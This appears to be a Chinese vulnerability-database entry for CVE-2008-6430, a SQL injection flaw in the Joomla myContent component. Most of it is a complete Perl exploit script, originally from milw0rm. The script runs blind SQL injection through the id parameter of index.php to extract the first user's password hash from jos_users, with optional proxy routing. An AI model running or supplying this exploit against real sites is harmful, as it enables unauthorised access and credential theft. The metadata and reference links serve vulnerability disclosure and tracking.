https://www.exploit-db.com/exploits/5714
https://www.securityfocus.com/bid/29468
https://cxsecurity.com/issue/WLB-2009030151
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-139
Joomla! 组件myContent脚本'index.php' SQL注入漏洞






漏洞ID | 1115329 | 漏洞类型 | SQL注入 |
发布时间 | 2008-06-01 | 更新时间 | 2009-03-18 |
![]() |
CVE-2008-6430 | ![]() |
CNNVD-200903-139 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Joomla!MyContent是Joomla!的一个内容列表的组件,可以让作者在一个列表中的看到所有内容,这意味着他们可以从前端编辑未发布的的项目。MyContent(com_mycontent)组件1.1.13中存在SQL注入漏洞。远程攻击者可以借助对index.php的一个view操作中的id参数,执行任意SQL指令。
|漏洞EXP
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component mycontent Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Usage: perl mycontent.pl host path <options> #\n";
print " # Example: perl mycontent.pl www.host.com /joomla/ -r 10 #\n";
print " # #\n";
print " # Options: #\n";
print " # -r Valid id #\n";
print " # Note: #\n";
print " # If the exploit failed #\n";
print " # Change 'regexp' value to the title of the page #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $rid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "r=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"r"})
{
$rid = $options{"r"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $rid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $rid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_mycontent&task=view&id=".$rid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "E-mail";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# milw0rm.com [2008-06-01]
|受影响的产品
Mark Fabrizio myContent 1.1.13
|参考资料
来源:XF
名称:mycontent-index-sql-injection(42783)
链接:http://xforce.iss.net/xforce/xfdb/42783
来源:BID
名称:29468
链接:http://www.securityfocus.com/bid/29468
来源:MILW0RM
名称:5714
链接:http://www.milw0rm.com/exploits/5714
来源:SECUNIA
名称:30490
链接:http://secunia.com/advisories/30490
来源:OSVDB
名称:45852
链接:http://osvdb.org/45852
检索漏洞
开始时间
结束时间